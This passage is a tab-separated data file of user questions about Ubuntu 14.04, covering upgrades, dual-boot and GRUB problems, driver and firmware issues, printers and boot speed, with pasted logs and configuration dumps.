480539	how to know that my ubuntu upgrade process worked out perfectly !	i wanted to upgrade my ubuntu 13.10 vps to 14.04 , but during the upgrade process i faced an issue in my command line and it seemed to me that the upgrade process did n't terminate normally . and i restart the session , when i run command sudo apt-get update it resumed the upgrade process again from where it stopped earlier . everything is [ ok ] i think . but to be sure , i wanted to know that the upgrade process went perfectly . nothing is missing in the server . how can i do that ?
480552	wubi not working for 14.04 on windows 8.1	i am using ms win-8.1 now i need ubuntu and i have downloaded 14.04 but when i launch wubi the cursor loads for some time and then it turns normal and nothing happens . i want to install it by wubi because if i install it without wubi it fails to boot after some time ( hardly month ) even affecting windows . so i want to install it by wubi to keep my windows safe . any solution ... ... ...
480556	dell m6800 with windos 8.1 on part-1 , can not run if ubuntu and fedora are 2nd and 3rd ossen ?	on a dell m6800 machine that has windows 8 pre-installed , i upgraded to 8.1 , then i loaded ubuntu 14.04 then fedora 20 the only way i could , that is in `` legacy '' bios mode . btw the ubuntu install was unable to complete but fedora did , and left all working , 2 bootable ossen , with grub2 from fedora doing the boots , but windows 8.1 is now `` invisible '' . i have run boot-repair but info is not useful . it tells me to switch to uefi which , on m6800 , does n't work with this ( too long-winded to explain why here ) . i need to have the grub2 configs `` see '' the original windows 8.1 partition , with bios switched to `` legacy '' . btw various posts have said make switch to uefi to boot from , say , usb-stick or dvd ; this is wrong , you ca n't - uefi mode only allows boot from the windows partition , which it says has a windows 8.1 on it , which does n't boot . basically , if you have actually succeeded in loading ubuntu 14.04 or fedora 20 on an m6800 , which comes with pre-loaded windows 8 , you will know how i fix this .
480561	ubuntu 14.04lts - runtime video card configuration through radeon driver	how does one configure radeon video cards when using the open source radeon driver - power profile , vsync , etc ? why i try the widely documented solution ( against overheating ) that worked for me under lmde ( confirmed with kernels up to 3.12.6 ) , i get the following error : $ sudo cat /sys/class/drm/card0/device/power_profile default $ sudo sh -c `` echo mid > /sys/class/drm/card0/device/power_profile '' sh : echo : i/o error exit 1 and when i try suggestions from arch 's ati wiki my modifications are simply ignored : $ sudo cat /sys/class/drm/card0/device/power_dpm_force_performance_level auto $ sudo sh -c `` echo high > /sys/class/drm/card0/device/power_dpm_force_performance_level '' $ sudo cat /sys/class/drm/card0/device/power_dpm_force_performance_level auto is this something ubuntu specific , or something introduced with the 3.13 version of the radeon driver ? i 'm encountering this on 2 laptops , one with a radeon hd6290 ( integrated gpu ) , the other with a discrete rv710 card . the rv710 needs a specific power setting to prevent overheating under lmde , fortunately it does n't seem to overheat with the ubuntu default setting .
480562	shell script read problem	i 'm trying to create a shell script with a read command , so that when i run the script , it will ask the user a yes- or no-question . if the user types yes , the script continues , and if she writes no it stops . what is the syntax for using the read command in such a way ? i am running ubuntu 13.04 .
480565	how do i switch layout with ctrl+shift or alt+shift in lxde ?	how do i switch layout with ctrl+shift , alt+shift or such in lxde ? all else being equal , i would prefer : a command-line solution a desktop environment-independent solution so that i can automate my next installation of ubuntu to include it by default , and so that the recipe still works if i will be actually using another desktop environment in the future . i am using ubuntu 13.10 32-bit with lxde installed . i would like to be able to cycle through english and russian layouts with ctrl+shift ( as i already do in unity ) . currently , when i go to `` preferences '' -- > `` keyboard input methods '' i see the following ( note that i have only managed to add ctrl+z as a shortcut to switch layouts , which is not what i wanted ) : then , when i click ellipsis ( note the line `` control z '' that you can see via a tiny crack of a window under `` keyboard shortcuts '' ) :
480566	play on linux : how do you move the install location to another partition ?	i have a ssd card that duel boots windows and ubuntu . my linux partition is running out of room and i want to move my games to my hard drive partition ( 1tb ) .
480567	ubuntu 14.04 upgrade succeeded partially - i would like to use a different mirror ; how can i do that ?	when i wanted to upgrade from ubuntu 13.10 to 14.04 the update manager told me that there was an unresolvable problem with calculating the upgrade . in order to see more details i performed the following on the command line : apt-get update apt-get upgrade apt-get dist-upgrade apt-get install update-manager-core do-release-upgrade now do-release-upgrade tells me that no newer version is available but the `` about '' box in the main menu tells me i am still on 13.10 . i think the latter is right , as for instance in the `` system settings '' there is no way to select local menus , which is present in 14.04 ( i tried with a dvd , and there it is ) . maybe the problem is related to the fact that `` apt-get update '' can not get two resources called `` saucy/inrelease '' and `` saucy/main/binary-i386/packages '' from the mirror ( mirror.informatik.uni-mannheim.de ; 404 not found ) . i would like to use a different mirror ; how can i do that ? any help appreciated , thanks in advance .
480568	vanishing printers under ubuntu 14.04	what causes printer to 'vanish ' from the cups printers.conf file under ubuntu 14.04 lts ? i have a network of drbl booted workstations and one of the network served printers keeps 'vanishing ' . here is the access_log from cups : circdesk2 % sudo zless -x /var/log/cups/access_log.1.gz localhost - - [ 08/jun/2014:14:28:38 -0400 ] `` post /admin/ http/1.1 '' 200 446 cups-add-modify-printer successful-ok localhost - - [ 08/jun/2014:14:28:45 -0400 ] `` post / http/1.1 '' 200 1193 cups-get-devices - localhost - - [ 08/jun/2014:14:29:32 -0400 ] `` post / http/1.1 '' 200 176 create-printer-subscriptions successful-ok localhost - - [ 08/jun/2014:14:33:37 -0400 ] `` post /admin/ http/1.1 '' 200 162 cups-delete-printer successful-ok localhost - - [ 08/jun/2014:14:46:30 -0400 ] `` post /admin/ http/1.1 '' 200 166 cups-delete-printer successful-ok what process do i need to kill or package to remove or service to disable to stop this from happening ? i do n't need or want some 'helpful ' daemon managing the printers on these machines .
480572	what does it take for a desktop environment of my choice to have its own official ubuntu derivative ?	i would like my desktop environment of choice to have its own official ubuntu derivative , like lxqt/lxde and lubuntu . what steps does it take to get there ? i would like to see if there is a point for effective application of my humble efforts to make it happen .
480579	brightness resets on boot/reboot in ubuntu 14.04	as the question statement explains itself , i 'm on ubuntu 14.04 and my screen brightness is reset to maximum after every boot , no matter how many times i reset . i applied the solution provided here brightness is reset to maximum on every restart but once , & it resulted into corrupting my ubuntu installation , i had to re-install my ubuntu copy . now i 'm reluctant to try that again . i need a safer method to set this problem straight . hardware : laptop - hp pavilion dv6 -7071tx screen res - 1080p full hd graphics - nvidia gt650m ubuntu - dual boot & installed on 32gb - ssd
480583	no more internet connection after update in 14.04 with intel dual band wireless ac 7260	my dell xps 15 ( haswell ) was working fine until i stupidly accepted recently to apply ubuntu updates . since then , my wifi does not work ( it shows `` device not managed '' when clicking wifi icon in toolbar ) . even usb to ethernet adapter does not seem to work . bluetooth at least `` sees '' other bluetooth devices around ... see below output from dmesg ( dmesg |grep iwl ) : [ 886.462459 ] iwlwifi 0000:06:00.0 : irq 51 for msi/msi-x [ 886.462561 ] iwlwifi 0000:06:00.0 : direct firmware load failed with error -2 [ 886.462562 ] iwlwifi 0000:06:00.0 : falling back to user helper [ 886.463284 ] iwlwifi 0000:06:00.0 : loaded firmware version 22.1.7.0 op_mode iwlmvm [ 886.475345 ] iwlwifi 0000:06:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144 [ 886.475433 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 886.475684 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 886.689214 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' below the output from modinfo iwlwifi : filename : /lib/modules/3.13.0-29- generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko license : gpl author : copyright ( c ) 2003-2013 intel corporation < ilw @ linux.intel.com > version : in-tree : description : intel ( r ) wireless wifi driver for linux firmware : iwlwifi-100-5.ucode firmware : iwlwifi-1000-5.ucode firmware : iwlwifi-135-6.ucode firmware : iwlwifi-105-6.ucode firmware : iwlwifi-2030-6.ucode firmware : iwlwifi-2000-6.ucode firmware : iwlwifi-5150-2.ucode firmware : iwlwifi-5000-5.ucode firmware : iwlwifi-6000g2b-6.ucode firmware : iwlwifi-6000g2a-5.ucode firmware : iwlwifi-6050-5.ucode firmware : iwlwifi-6000-4.ucode firmware : iwlwifi-3160-7.ucode firmware : iwlwifi-7260-7.ucode srcversion : 1e6912e109d5a43b310fb34 alias : pci : v00008086d0000095asv*sd00005490bc*sc*i* ( a pack of lines of kind `` alias : pci : xxxxx ... . '' that i guess are not helpful ) alias : pci : v00008086d0000095bsv*sd00005290bc*sc*i* depends : cfg80211 intree : y vermagic : 3.13.0-29-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 66:02 : cb:36 : f1:31:3b : ea:01 : c4 : bd : a9:65:67 : cf : a7:23 : c9:70 : d8 sig_hashalgo : sha512 parm : swcrypto : using crypto in software ( default 0 [ hardware ] ) ( int ) parm : 11n_disable : disable 11n functionality , bitmap : 1 : full , 2 : disable agg tx , 4 : disable agg rx , 8 enable agg tx ( uint ) parm : amsdu_size_8k : enable 8k amsdu size ( default 0 ) ( int ) parm : fw_restart : restart firmware in case of error ( default true ) ( bool ) parm : antenna_coupling : specify antenna coupling in db ( defualt : 0 db ) ( int ) parm : wd_disable : disable stuck queue watchdog timer 0=system default , 1=disable , 2=enable ( default : 0 ) ( int ) parm : nvm_file : nvm file name ( charp ) parm : bt_coex_active : enable wifi/bt co-exist ( default : enable ) ( bool ) parm : led_mode:0=system default , 1=on ( rf on ) /off ( rf off ) , 2=blinking , 3=off ( default : 0 ) ( int ) parm : power_save : enable wifi power management ( default : disable ) ( bool ) parm : power_level : default power save level ( range from 1 - 5 , default : 1 ) ( int ) i downloaded the latest versions of iwlwifi firmware from git ( git clone git : //git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git ; copy iwlwifi-3160-9.ucode iwlwifi-7260-9.ucode iwlwifi-7265-9.ucode to /lib/firmware and reboot ) but as you can imagine it did not help . update # 1 : downloaded from http : //wireless.kernel.org/en/users/drivers/iwlwifi ? action=attachfile & do=get & target=iwlwifi-7260-ucode-22.15.8.0.tgz and copied the file into /lib/firmware . after reloading it with modprobe , it seems to be ok : [ 14.761283 ] iwlwifi 0000:06:00.0 : enabling device ( 0000 - > 0002 ) [ 14.761472 ] iwlwifi 0000:06:00.0 : irq 51 for msi/msi-x [ 14.772478 ] iwlwifi 0000:06:00.0 : loaded firmware version 22.15.8.0 op_mode iwlmvm [ 14.800274 ] iwlwifi 0000:06:00.0 : detected intel ( r ) dual band wireless ac 7260 , rev=0x144 [ 14.800349 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 14.800657 ] iwlwifi 0000:06:00.0 : l1 enabled ; disabling l0s [ 15.007048 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs' however , clicking in wifi in the toolbar still shows `` device not managed '' . any clues ? many thanks ! luis
480585	problem logging into my desktop account on xubuntu 14.04lts	my main account on xubuntu 14.04lts 64bit loops back to the login screen after it tries to load . guest account works , and i managed to make a new account using terminal , but i need access to all the stuff my main account has still . what i 've tried already : -deleting/renaming/moving .xauthority -different display managers -different desktop environments ( mate , e17 etc ... ) -scanned disk for errors i really need to fix this , it 's a brand new computer that i 've really been happy with and had no problems until this .
480587	my keyboard layout changes after suspend	this afternoon , when i logged in ubuntu after leaving the laptop suspended since morning , i noticed that my keyboard layout had changed , although the upper left keyboard indicator is correctly showing my keyboard layout ( portuguese brazil ) . questions : what could have made this change how can i get my keyboard correctly mapped in ubuntu
480590	unable to record from usb sound card line-in connector	i 've been googling and struggling with this for a while but have n't been able to make this work . i bought a usb sound card ( encore enmab 8-cm ) to record from its line-in connector . i 'm not sure which input to pick in audicity , but i'me sure i 've tested them all . these are all the available inputs i have in audacity . but there 's no sound being recorded at all . i 've already checked the device is working , so i really do n't know if i 'm doing something wrong . any help will be very appreciated . cheers .
480592	ec2 instance wo n't boot !	so i had a server lose connection while updating to 14.04lts . foolishly , it ended up getting rebooted , and now i 'm here . i disconnected the volume and mounted it on another system , chrooted it , and updated the kernel . still no dice . any idea what the problem could be ? thanks in advance ! the instance log is below : ******************* blkfront for device/vbd/2049 ********** backend at /local/domain/0/backend/vbd/3005/2049 failed to read /local/domain/0/backend/vbd/3005/2049/feature-barrier . failed to read /local/domain/0/backend/vbd/3005/2049/feature-flush-cache . 16777216 sectors of 512 bytes ************************** [ h [ j booting 'ubuntu 14.04 lts , memtest86+' root ( hd0 ) filesystem type is ext2fs , using whole disk kernel /boot/memtest86+.bin ============= init tpm front ================ tpmfront : error unable to read device/vtpm/0/backend-id during tpmfront initialization ! error = enoent tpmfront : info shutting down tpmfront xc : error : panic : xc_dom_core.c:621 : xc_dom_find_loader : no loader found : invalid kernel xc_dom_parse_image returned -1 close ( 3 ) error 9 : unknown boot failure press any key to continue ...
480593	`` dirname : invalid option -- '/ ' `` error when i try to run a .sh file ?	i 'm trying to run a file in linux ( ubuntu 14.04 ) , but i get this error : dirname : invalid option -- '/' try 'dirname -- help ' for more information . the command i am using to run the .sh file is this : ./extract-files.sh but when i type that ( yes , i 'm in the directory that it is in ) , it gives me that error . help !
480598	fonts have gone big after an update ?	i have accepted an update to ubuntu 13.10 but the fonts has gone very large and the page does n't fit on the lap top and i can not get it back to normal . is there a way i can revert it back to previous version ?
480602	bless does n't fix white boot screen boot delay for single-boot xubuntu 14.04 on macbook 4,1	i still have a 30-second delay on the white boot-up screen before xubuntu loads after trying various combinations of bless -- device as recommended here : https : //help.ubuntu.com/community/mactelsupportteam/appleintelinstallation # avoid_long_efi_wait_before_grub i wonder if anyone has experienced this before , or can point me to some good steps for troubleshooting this issue ? i have cycled my macbook dozens of times , it would be great to be able to boot quicker . i am single-booting xubuntu 14.04 ( no mac osx partitions or any other os , just a grub partition at sda1 , a main partition at sda2 , and a swap at the end of the drive ) . suggestions very appreciated .
480603	is it possible to hide launcher for certain apps ?	as 14.04lts has been released i thought i 'd try to make larger switch to ubuntu - especially considering most of the apps i use at work are at last available in linux versions ( with the major exception being rhino3d v5 - hope that it will be possible to launch it with wine somehow ) . but as i use my pc for 3d design i need every damn inch of screen space . and this is where launcher becomes a pain . while in general i like it ( as well as the rest of unity ) when i do office work ( emails , docs etc ) it has turned out to be a major pain with 3d apps and tablet . i 'd like to set launcher to hide when certain apps are maximized . is it possible ? if not is it possible to set it as intellihide/stay in the background globally , so it wo n't be visible when any app is maximized ? autohide is ( sadly ) not a good solution - the way ubuntu handles revealing the hidden bar is tricky to work with when you use a graphic tablet ( but to be honest i have gripes with it even when using a mouse ) . i need the bar to disappear or stay in the background so it wo n't take screen space - 3d apps have way too much menus that eat valuable screen space already .
480610	boot extremely slow in ubuntu 14.04	my boot to ubuntu in my ideapad z470 is incredible slow , it takes about one minute to get to the os itself . does anyone know what i can do to make it faster ? if i recall , booting time was n't that slow in 13.10 , but it still was slow .
480612	can not execute binary file	i am new to ubuntu and i 'm trying to install popcorn time . i downloaded 32 bit version and tried to install it but that 's where the problem started showing . i double clicked the executable file and well , nothing happened . it 's a official download from their website but it does n't work . maybe i 'm doing something wrong ... anyway , i found out that you can install it from a script , but people keep talking in ubuntu terms and i do n't understand it , so i have a few questions : how to make a script ? ( which i 'm suppose to run in terminal using bash command ) , is it normal that i can not run the installer , and if that is an installer or just files for the program . if it is an installer , how do i make it work ? what does `` can not execute binary file '' mean ? thank you in advance , hope i 'm not asking too many questions ( please understand that i 'm new to ubuntu ) and sorry about my english . xd
480613	is 14.04 lts sufficient for for dual cpus	i am totally new to ubuntu ( and dual cpus ) . do i just download the current iso ( 14.04 lts 64-bit ) from www.ubuntu.com/download/server , or do i need something else to support a server using dual cpus ? i have a dell poweredge r720 server with dual intel xeon e5-2637v2 4c 3.5ghz cpus ; with hardware based raid ( perc h710p ) ; idrac7 express ... we have placed it on the rack and upgraded the bios . i am after the usual lamp system .
480615	windows 8 not booting after manually upgrading to 14.04	i installed ubuntu 14.04 on top of my previous 13.10 ubuntu installation . i did it manually by formating the mount and home folders without touching the windows partition . apparently it did n't detect the windows os . but there is a 'windows boot manager ( on /dev/sda2 ) entry on the grub menu but it does n't do anything . i can only boot into ubuntu .
480617	remove ubuntu bootloader from windows 7 dual boot	i have an old hard drive that i installed ubuntu 14.04 on a few weeks ago , and a new hard drive which has windows 7 installed . i am using these in a dual boot . i am using the windows 7 bootloader and i added ubuntu through a program called easybcd . this worked perfectly , untill i updated ubuntu . now when i choose ubuntu from the windows 7 bootloader , it takes me to the ubuntu bootloader ( on the second hard drive ) , which makes me choose what os to boot again . how can i disable/skip this second bootloader ? ( i want to use the windows 7 bootloader , and not swap ) . thanks in advance for your help .
480619	installed ubuntu 14.04lts	on my laptop which came pre-installed with windows 8.1 . felt i needed to see the competition for myself to establish which was a better os . so i followed the channels to dual boot . all seemed fine and i accessed ubuntu with no issues after selecting this from the menu to select the os . i should add that the boot method was changed to legacy . however , since using ubuntu , i no longer have the ability to select the os . the laptop simply logs straight into ubuntu . i therefore attempted to access the recovery options , only it appears the windows 8 bootloader has somehow been corrupted as i am now told to use the windows 8 recovery disc ( which , as this was pre-installed - i do not have ) . left with no other alternative , i have scoured these forums without success , and so i am hoping someone in the know ( or who has experienced similar ) can help . i have tried boot repair again without success . on rebooting i am only presented with a basic splash screen asking me to select ubuntu , memtest , windows 8 recovery or windows 8 bootloader ( the bootloaders again require i insert the disc ) . i have tried code : cat /boot/grub/grub.cfg df -h sudo fdisk -l cat /proc/partitions # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=800x600 load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_gb insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=20 # fallback normal timeout code in case the timeout_style feature is # unavailable . else set timeout=20 fi fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi linux /boot/vmlinuz-3.13.0-29-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro vga=789 quiet quiet splash $ vt_handoff initrd /boot/initrd.img-3.13.0-29-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { menuentry 'ubuntu , with linux 3.13.0-29-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-advanced-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro vga=789 quiet quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-29-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-29-generic-recovery-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-29-generic ... ' linux /boot/vmlinuz-3.13.0-29-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro recovery nomodeset vga=789 quiet echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-29-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-advanced-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro vga=789 quiet quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=d2f10f36-e3bb-4d83-a9b8-5d456fc454ad ro recovery nomodeset vga=789 quiet echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi knetbsd /boot/memtest86+.elf } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry 'windows recovery environment ( loader ) ( on /dev/sda2 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-7a6a69d66a698fa5 ' { insmod part_gpt insmod ntfs set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 7a6a69d66a698fa5 else search -- no-floppy -- fs-uuid -- set=root 7a6a69d66a698fa5 fi drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry 'windows 8 ( loader ) ( on /dev/sda3 ) ' -- class windows -- class os $ menuentry_id_option 'osprober-chain-8c88-80f7 ' { insmod part_gpt insmod fat set root='hd0 , gpt3' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt3 -- hint-efi=hd0 , gpt3 -- hint-baremetal=ahci0 , gpt3 8c88-80f7 else search -- no-floppy -- fs-uuid -- set=root 8c88-80f7 fi drivemap -s ( hd0 ) $ { root } chainloader +1 } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi if [ `` $ { next_entry } '' ] ; then set default= '' $ { next_entry } '' set next_entry= save_env next_entry set boot_once=true else set default= '' 0 '' fi if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_gpt insmod ext2 set root='hd0 , gpt9' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt9 -- hint-efi=hd0 , gpt9 -- hint-baremetal=ahci0 , gpt9 d2f10f36-e3bb-4d83-a9b8-5d456fc454ad else search -- no-floppy -- fs-uuid -- set=root d2f10f36-e3bb-4d83-a9b8-5d456fc454ad fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=800x600 load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_gb insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else if [ x $ feature_timeout_style = xy ] ; then set timeout_style=menu set timeout=20 # fallback normal timeout code in case the 